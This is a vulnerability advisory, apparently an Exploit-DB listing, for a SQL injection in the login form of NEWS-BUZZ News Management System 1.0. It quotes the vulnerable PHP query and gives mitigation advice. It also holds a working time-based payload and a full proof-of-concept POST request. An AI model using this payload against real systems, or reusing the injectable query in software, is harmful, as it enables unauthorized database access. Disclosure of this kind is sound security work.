NEWS-BUZZ News Management System 1.0 - SQL Injection

vendor:

NEWS-BUZZ News Management System

by:

egsec

7.1

CVSS

HIGH

SQL Injection

CWE

Product Name: NEWS-BUZZ News Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2024-10758

CPE: a:news-buzz_news_management_system:news-buzz:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 11 Pro

2024

NEWS-BUZZ News Management System 1.0 – SQL Injection

A SQL injection vulnerability exists in the login functionality of NEWS-BUZZ News Management System version 1.0. This vulnerability allows an attacker to manipulate the SQL query by altering the user_name parameter, potentially leading to unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent direct user input into SQL queries. Additionally, enforcing the principle of least privilege can help limit the impact of successful exploitation.

Source

Exploit-DB raw data:

# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact:  The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability
# CVE : CVE-2024-10758

## Vulnerability Description:

There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.

## Vulnerable code section:

In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:

<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>

In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code.

## Proof of Concept (PoC):

1.Location: http://localhost/NEWS-BUZZ/index.php

2.Time-Based SQL Injection Payload: ' OR sleep(10)#


3.PoC request:

POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=

4.PoC response:

The response will come called time by using sleep() function.